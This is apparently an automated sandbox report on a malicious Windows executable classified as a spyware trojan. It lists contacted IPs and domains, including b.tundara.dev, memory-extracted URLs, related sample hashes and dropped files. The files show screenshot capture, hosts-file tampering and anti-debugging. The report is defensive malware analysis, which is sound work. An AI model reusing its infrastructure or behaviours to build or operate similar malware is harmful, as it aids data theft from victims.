                                                                            https://www.msn.comfile.exe, 00000000.00000002.1486338572.000000C000C74000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000006.00000002.1289484446.0000021B8B2E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://contoso.com/powershell.exe, 00000006.00000002.1303055043.0000021B9B134000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://nuget.org/nuget.exepowershell.exe, 00000006.00000002.1303055043.0000021B9B134000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://emojione.comEmojiOnefile.exefalse
                                                                                      		high
                                                                                      https://discord.com/api/v9/users/file.exefalse
                                                                                        		high
                                                                                        http://dejavu.sourceforge.net/wiki/index.php/Licensehttp://dejavu.sourceforge.net/wiki/index.php/Licfile.exefalse
                                                                                          		high
                                                                                          https://aka.ms/pscore68powershell.exe, 00000006.00000002.1289484446.0000021B8B0C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000006.00000002.1289484446.0000021B8B0C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://dejavu.sourceforge.net/wiki/index.php/Licensefile.exefalse
                                                                                                		high
                                                                                                https://www.google.com/file.exe, 00000000.00000003.1461142106.000000C0017F3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1479046546.000000C00010A000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://www.amazon.de/file.exe, 00000000.00000002.1482903932.000000C000519000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1489672991.000000C0012FF000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://dejavu.sourceforge.netfile.exefalse
                                                                                                      		high
                                                                                                      https://www.baidu.com/file.exe, 00000000.00000003.1461142106.000000C0017F3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1479046546.000000C000395000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                        		high

                                                                                                        World Map of Contacted IPs

                                                                                                        • No. of IPs < 25%
                                                                                                        • 25% < No. of IPs < 50%
                                                                                                        • 50% < No. of IPs < 75%
                                                                                                        • 75% < No. of IPs

                                                                                                        Public IPs

                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                        208.95.112.1
                                                                                                        		ip-api.comUnited States
                                                                                                        		53334TUT-ASUSfalse
                                                                                                        51.210.106.44
                                                                                                        		b.tundara.devFrance
                                                                                                        		16276OVHFRfalse

                                                                                                        General Information

                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                        Analysis ID:1563338
                                                                                                        Start date and time:2024-11-26 20:37:06 +01:00
                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                        Overall analysis duration:0h 7m 20s
                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                        Report type:full
                                                                                                        Cookbook file name:default.jbs
                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                        Number of analysed new started processes analysed:30
                                                                                                        Number of new started drivers analysed:0
                                                                                                        Number of existing processes analysed:0
                                                                                                        Number of existing drivers analysed:0
                                                                                                        Number of injected processes analysed:0
                                                                                                        Technologies:
                                                                                                        • HCA enabled
                                                                                                        • EGA enabled
                                                                                                        • AMSI enabled
                                                                                                        Analysis Mode:default
                                                                                                        Analysis stop reason:Timeout
                                                                                                        Sample name:file.exe
                                                                                                        Detection:MAL
                                                                                                        Classification:mal92.troj.adwa.spyw.evad.winEXE@25/13@4/2
                                                                                                        EGA Information:Failed
                                                                                                        HCA Information:Failed
                                                                                                        Cookbook Comments:
                                                                                                        • Found application associated with file extension: .exe

                                                                                                        Warnings

                                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                                                                                        • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                                                        • Execution Graph export aborted for target file.exe, PID 1408 because there are no executed function
                                                                                                        • Execution Graph export aborted for target powershell.exe, PID 7272 because it is empty
                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                        • Report size getting too big, too many NtCreateFile calls found.
                                                                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                        • VT rate limit hit for: file.exe

                                                                                                        Simulations

                                                                                                        Behavior and APIs

                                                                                                        TimeTypeDescription
                                                                                                        14:37:59API Interceptor26x Sleep call for process: powershell.exe modified
                                                                                                        14:38:12API Interceptor4x Sleep call for process: WMIC.exe modified

                                                                                                        Joe Sandbox View / Context

                                                                                                        IPs

                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        208.95.112.1oIGNK22EVW.exeGet hashmaliciousUnknownBrowse
                                                                                                        • ip-api.com/json/
                                                                                                        5WTfUvmHO0.exeGet hashmaliciousUnknownBrowse
                                                                                                        • ip-api.com/json/
                                                                                                        4sN88dMzwC.exeGet hashmaliciousUnknownBrowse
                                                                                                        • ip-api.com/json/
                                                                                                        JEr70NrBvQ.exeGet hashmaliciousUnknownBrowse
                                                                                                        • ip-api.com/json/
                                                                                                        8wLgIg588m.exeGet hashmaliciousUnknownBrowse
                                                                                                        • ip-api.com/json/
                                                                                                        DmI602ZFyp.exeGet hashmaliciousUnknownBrowse
                                                                                                        • ip-api.com/json/
                                                                                                        oIGNK22EVW.exeGet hashmaliciousUnknownBrowse
                                                                                                        • ip-api.com/json/
                                                                                                        5WTfUvmHO0.exeGet hashmaliciousUnknownBrowse
                                                                                                        • ip-api.com/json/
                                                                                                        JEr70NrBvQ.exeGet hashmaliciousUnknownBrowse
                                                                                                        • ip-api.com/json/
                                                                                                        4sN88dMzwC.exeGet hashmaliciousUnknownBrowse
                                                                                                        • ip-api.com/json/
                                                                                                        51.210.106.44oIGNK22EVW.exeGet hashmaliciousUnknownBrowse
                                                                                                          5WTfUvmHO0.exeGet hashmaliciousUnknownBrowse
                                                                                                            4sN88dMzwC.exeGet hashmaliciousUnknownBrowse
                                                                                                              JEr70NrBvQ.exeGet hashmaliciousUnknownBrowse
                                                                                                                8wLgIg588m.exeGet hashmaliciousUnknownBrowse
                                                                                                                  DmI602ZFyp.exeGet hashmaliciousUnknownBrowse
                                                                                                                    oIGNK22EVW.exeGet hashmaliciousUnknownBrowse
                                                                                                                      5WTfUvmHO0.exeGet hashmaliciousUnknownBrowse
                                                                                                                        JEr70NrBvQ.exeGet hashmaliciousUnknownBrowse
                                                                                                                          4sN88dMzwC.exeGet hashmaliciousUnknownBrowse

                                                                                                                            Domains

                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            w.tundara.dev5WTfUvmHO0.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 51.210.106.44
                                                                                                                            4sN88dMzwC.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 51.210.106.44
                                                                                                                            JEr70NrBvQ.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 51.210.106.44
                                                                                                                            8wLgIg588m.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 51.210.106.44
                                                                                                                            DmI602ZFyp.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 51.210.106.44
                                                                                                                            5WTfUvmHO0.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 51.210.106.44
                                                                                                                            JEr70NrBvQ.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 51.210.106.44
                                                                                                                            4sN88dMzwC.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 51.210.106.44
                                                                                                                            8wLgIg588m.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 51.210.106.44
                                                                                                                            DmI602ZFyp.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 51.210.106.44
                                                                                                                            b.tundara.devoIGNK22EVW.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 51.210.106.44
                                                                                                                            5WTfUvmHO0.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 51.210.106.44
                                                                                                                            4sN88dMzwC.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 51.210.106.44
                                                                                                                            JEr70NrBvQ.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 51.210.106.44
                                                                                                                            8wLgIg588m.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 51.210.106.44
                                                                                                                            DmI602ZFyp.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 51.210.106.44
                                                                                                                            oIGNK22EVW.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 51.210.106.44
                                                                                                                            5WTfUvmHO0.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 51.210.106.44
                                                                                                                            JEr70NrBvQ.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 51.210.106.44
                                                                                                                            4sN88dMzwC.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 51.210.106.44
                                                                                                                            ip-api.comoIGNK22EVW.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 208.95.112.1
                                                                                                                            5WTfUvmHO0.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 208.95.112.1
                                                                                                                            4sN88dMzwC.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 208.95.112.1
                                                                                                                            JEr70NrBvQ.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 208.95.112.1
                                                                                                                            8wLgIg588m.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 208.95.112.1
                                                                                                                            DmI602ZFyp.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 208.95.112.1
                                                                                                                            oIGNK22EVW.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 208.95.112.1
                                                                                                                            5WTfUvmHO0.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 208.95.112.1
                                                                                                                            JEr70NrBvQ.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 208.95.112.1
                                                                                                                            4sN88dMzwC.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 208.95.112.1

                                                                                                                            ASNs

                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            OVHFRDemande de proposition du Module Ultra Inc.malz.pdfGet hashmaliciousUnknownBrowse
                                                                                                                            • 144.217.96.200
                                                                                                                            Demande de proposition du Allesi Telecom.pdfGet hashmaliciousUnknownBrowse
                                                                                                                            • 66.70.227.242
                                                                                                                            Driving a supply chain planning evaluation.emlGet hashmaliciousLure-BasedAttackBrowse
                                                                                                                            • 94.23.161.19
                                                                                                                            oIGNK22EVW.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 51.210.106.44
                                                                                                                            5WTfUvmHO0.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 51.210.106.44
                                                                                                                            4sN88dMzwC.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 51.210.106.44
                                                                                                                            JEr70NrBvQ.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 51.210.106.44
                                                                                                                            8wLgIg588m.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 51.210.106.44
                                                                                                                            DmI602ZFyp.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 51.210.106.44
                                                                                                                            oIGNK22EVW.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 51.210.106.44
                                                                                                                            TUT-ASUSoIGNK22EVW.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 208.95.112.1
                                                                                                                            5WTfUvmHO0.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 208.95.112.1
                                                                                                                            4sN88dMzwC.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 208.95.112.1
                                                                                                                            JEr70NrBvQ.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 208.95.112.1
                                                                                                                            8wLgIg588m.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 208.95.112.1
                                                                                                                            DmI602ZFyp.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 208.95.112.1
                                                                                                                            oIGNK22EVW.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 208.95.112.1
                                                                                                                            5WTfUvmHO0.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 208.95.112.1
                                                                                                                            JEr70NrBvQ.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 208.95.112.1
                                                                                                                            4sN88dMzwC.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 208.95.112.1

                                                                                                                            JA3 Fingerprints

                                                                                                                            No context

                                                                                                                            Dropped Files

                                                                                                                            No context

                                                                                                                            Created / dropped Files

                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:data
                                                                                                                            Category:modified
                                                                                                                            Size (bytes):64
                                                                                                                            Entropy (8bit):0.34726597513537405
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Nlll:Nll
                                                                                                                            MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                            SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                            SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                            SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                            Malicious:false
                                                                                                                            Preview:@...e...........................................................

                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4zg0b4gn.ydm.psm1

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5fn4sr5w.kee.ps1

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ab4lsrjy.0jo.psm1

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b00efbli.ecd.ps1

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cdhtyho1.uca.psm1

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kqtl2wr2.env.psm1

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_okfiqdgr.ex2.ps1

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_shbyt53z.iy3.ps1

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                            C:\Users\user\AppData\Local\Temp\logs-temp\cerblogs.log

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                            File Type:ASCII text, with very long lines (65479)
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):108252
                                                                                                                            Entropy (8bit):6.000529922966145
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3072:HA0YE97Bg0q74hSPvXPPPQRt5F4wpeDvT:HADENtjSfgc
                                                                                                                            MD5:BDE5D3193EC921B33FA89DD80C4B70AE
                                                                                                                            SHA1:FB6CD06AFD3558BEB1BCBCDF7BBDCA1DEC732DFC
                                                                                                                            SHA-256:7B24B50628ADB77F59DC6195FB0B05C21539C2F06C077B103216D0DE9FE353AA
                                                                                                                            SHA-512:7B61F8E6F32EB2C351A8673DB9DBD4BA46AB6BFB0ECC882175ED91535BDD89153A1C050ADBFF2794301BCB15D47291546C7EC5BFEB5D5AC86F920AA11324E765
                                                                                                                            Malicious:false
                                                                                                                            Preview:2024/11/26 14:37:58 COUCOU.2024/11/26 14:38:06 ANTIDEBUG.2024/11/26 14:38:11 w4mwXbkp3ZwSilFcWNU42zW6GWK6E3YhpFu82w1Vs1HqliCK5LyQ6WbaUpKMIZXbzHR5TuhyYUkVz4NyBdYKVsjYGLmZLVpnRitNpFICgnMb6cnOGlCgDzUEBOHFmvStOaV3VwM5ZFOrV1IzXbhdLXpRQxOk5aWPQndmuP7jnrEoIjr8QODIV13yoYJixiMS24PFQZCEIUypfSsGMBFWdyC4gvWLS4vmAABqtKl6NJLpz1WqxNkGJprKQfipkIDepa0wc0OdLiR4IIF62ISPzEXlfyI92cZhefzMJiSogtidyCK80pBAbvbVyvh3XqttsGE4BSOjDxcaKCvw3e1XgJFKZSXLoOG3jObsiZ2XkUIk1SJahSKO3flWo6kskIC0vrJFg030gyPENsZjsfDk2dQkGO0EpRsCSaGCM9pmhDhJCf7ZV3FtzmmBec4yDOYXQxdf5SPczbDQfudddwNEL5ulxmbv10mJzDp66baomN0diMuSsl5vKUWBbe2zjeB4lwOMJdEdPPb2IDsf47OV5A7YEqyBwsbKoRjmKdRXUAzSivkDqd2zrNGNKzSPAKsPCQ1Wlq64gHo5ZXtyWciPu6SHjYoj3VGj4oou54fHzaWDAX5ExT6We0nDgxHUHLVPHOnZX6yjla4wE6nJ9YpKMFTEcZHp0ihwskwLJGpCEZswSWQrRD2CjSGTgFaid7JDO4KlIMUf8FxAZejPZxlzrcEh6zcgLT1uMJybA00bsTL2minK5Hq67eKSrIUhHuG97u3oKfknlFmwwXkPmDfCNr881KkghXAK1ItHCQ63sPff4PX8DSvvvAsrYej6sKvtTY1Edt42VT93f9flXSHpuEG04GEHoDhv5jPS32UcNziRRhrr5U1yGsIigfFgQGcxkYISA8aAu3pdfmjueMqOCMs2R4n

                                                                                                                            C:\Users\user\Desktop\screenshot_0.png

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                            File Type:PNG image data, 1280 x 1024, 8-bit/color RGB, non-interlaced
                                                                                                                            Category:modified
                                                                                                                            Size (bytes):437039
                                                                                                                            Entropy (8bit):7.996846254185691
                                                                                                                            Encrypted:true
                                                                                                                            SSDEEP:12288:zjD4GODKh07sMozuP8QKM6U1H/cJJifWKxQR:v0WGJozCEM6aUJJ4ZxU
                                                                                                                            MD5:46E375D0EB54F40DD8743DA07077BB73
                                                                                                                            SHA1:B613B0E068B97D0AADF5748C05FDAD5C3A956CFF
                                                                                                                            SHA-256:7AEFFD9A4540F90556B08FF0E023CA371801CEBF56C1E3E7684549882EA34A03
                                                                                                                            SHA-512:7DFCB6ECBD1C57BF4961FD5D0B905DA4D48D78530DDFDE5207D1E974369F876429C4CCABCDFBEF574119EF7C057F45570AB7C05BEC6B3C4176224F51B0AED879
                                                                                                                            Malicious:false
                                                                                                                            Preview:.PNG........IHDR.............1.c.....IDATx....-WY&:gU...>I..$. 6Hx..Q...t...<.....^L.....W...b.v.U.K....*(:D.PQA......T.$..c......$..^kU..........k..Y..v..Y.|T.....H..4.K..q..k\}.......v.7..n....G.....j".P"_...Z....(.R......Y...D...^.[.4.kX.(....G.[=+..3..!....55..<k.l..y.D;..lg<.......VZx}.I.......A.7.......y...s...]O......T.|..._...O.....#.#....s...#.A.....Z..9..f.l{|py.M..a2....(Zs..|....b.EQ..W.vr.....H........."G..2.L..rS.~\.5. ......s..<.(J.D.Tor.gd..,.9..)....4M....|K......f.$I.4..8.1t|/.].38..$Gd...u...3......N.8R.x}w.vc.........tK.r. NT/.R.O......4M......my<...4ME...(PLM.a.. k@..Rib...8.&.I....3.A..W...h?I.cL.`.....i.."..c.4...I..F..B..%..I.y.eL...2\Y).$?...e..!.r...i..C.$..WF..../.H1..........+.].,.LMl..e...A.$.;..H...\(..:.cU.F.......9...K.:..ki...g<.C.....c...X.......,.s_*..s...6|.=..]..#C.....(x. C..5.........7K..NQ..r;..)@.cu...A......h".Wm....t..`#-.\..o..A...H....0.....|_\.x.(....[70....`E`...... Z...U..0..

                                                                                                                            C:\Windows\System32\drivers\etc\hosts

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                            File Type:ASCII text, with CRLF, LF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):2165
                                                                                                                            Entropy (8bit):4.522303506272206
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:48:vDZhyoZWM9rU5fFcqwUYi1iBopn2g2+oGSVy2w23c4Zezwd0/a7S4qqBLE97aFsL:vDZEurK9UUlcBsn2g2+lSw2w23c4ZezT
                                                                                                                            MD5:BD87D7EA7B5DBD74CC0B0E38477F6079
                                                                                                                            SHA1:63C28862A5D0052F2425A8B45AC0F66572A02F33
                                                                                                                            SHA-256:EB97F9588DFFD94BC3B06EAED77751593F32F9E0D09A9B7868746AB16E7F45F1
                                                                                                                            SHA-512:1DD93CD24870D9716980B38145A1DC23F8EFB5DB93DB9D5223C1D0984CD8E064C6C99B6833F7066392BA79D887AC37F0BA3D8D5CD657B56967D51A2836C52AF0
                                                                                                                            Malicious:true
